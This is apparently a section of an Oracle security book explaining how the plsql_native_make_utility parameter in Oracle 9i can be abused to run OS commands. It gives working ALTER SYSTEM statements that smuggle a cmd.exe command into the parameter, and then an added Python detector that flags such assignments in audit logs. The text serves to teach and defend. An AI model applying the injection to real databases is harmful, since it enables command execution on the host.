10.5. Running OS Commands Using ALTER SYSTEM

This next example is a bit of a "hack" and was never intended by Oracle as a proper method for running commands, but it works well. In Oracle 9i it is possible to manipulate the way Oracle compiles native PL/SQL programs. This is done by providing the name of a make program in the plsql_native_make_utility parameter. Clearly, this can be abused to run OS commands:

ALTER SYSTEM SET plsql_native_make_utility = 'cmd.exe /C dir > c:\ooops.txt &';
ALTER SYSTEM SET plsql_native_make_file_name = ' foo';
ALTER SYSTEM SET plsql_native_library_dir='bar';

CREATE OR REPLACE PROCEDURE ohoh AS
BEGIN
NULL;
END;
/
show errors

When Oracle compiles the ohoh procedure, Oracle executes the following:

cmd.exe /C dir > c:\ooops.txt & -f foo bar/RUN_CMD__SYSTEM__0.DLL

Oracle 10g deprecated the plsql_native_make_utility parameter.
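
On the defensive side, captured SQL (for example, statement text from an audit trail) can be reviewed for assignments to plsql_native_make_utility whose value is more than a bare program path. The following Python check is an added example, not code from the book; the function names, the interpreter list, the sample statements, and the rule that a legitimate value is a single path without spaces are assumptions.

```python
import re

# Matches ALTER SYSTEM SET <plsql_native_*> = '<value>' (Oracle doubles '' inside literals).
ASSIGN = re.compile(
    r"alter\s+system\s+set\s+(plsql_native_\w+)\s*=\s*'((?:[^']|'')*)'",
    re.IGNORECASE,
)
# Characters that let a "make utility" value carry a shell command line.
SHELL_META = re.compile(r"[&|;<>`$]")
# Assumed list of interpreter names; extend it for the platforms you run.
INTERPRETERS = ("cmd.exe", "cmd", "command.com", "sh", "bash", "ksh", "csh", "powershell.exe")

def find_assignments(sql_text):
    """Return [(parameter, value)] for every plsql_native_* assignment in sql_text."""
    return [(m.group(1).lower(), m.group(2).replace("''", "'"))
            for m in ASSIGN.finditer(sql_text)]

def review(sql_text):
    """Return findings for statements that point the make utility at a command line."""
    findings = []
    for name, value in find_assignments(sql_text):
        if name != "plsql_native_make_utility":
            continue
        tokens = value.split()
        # Base name of the first token, with Windows or Unix path separators.
        program = tokens[0].replace("\\", "/").rsplit("/", 1)[-1].lower() if tokens else ""
        reasons = []
        if SHELL_META.search(value):
            reasons.append("shell metacharacter")
        if len(tokens) > 1:  # assumption: a legitimate value is one path, no spaces
            reasons.append("arguments after program name")
        if program in INTERPRETERS:
            reasons.append("command interpreter")
        if reasons:
            findings.append({"value": value, "reasons": reasons})
    return findings

# Constructed sample: two statements from the text plus one benign setting.
SAMPLE = r"""
ALTER SYSTEM SET plsql_native_make_utility = 'cmd.exe /C dir > c:\ooops.txt &';
ALTER SYSTEM SET plsql_native_make_file_name = ' foo';
ALTER SYSTEM SET plsql_native_make_utility = '/usr/ccs/bin/make';
"""

if __name__ == "__main__":
    for f in review(SAMPLE):
        print(f["value"], "->", ", ".join(f["reasons"]))
```

A make utility installed under a path containing spaces would be reported by the second rule, so treat findings as items to review rather than confirmed abuse.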
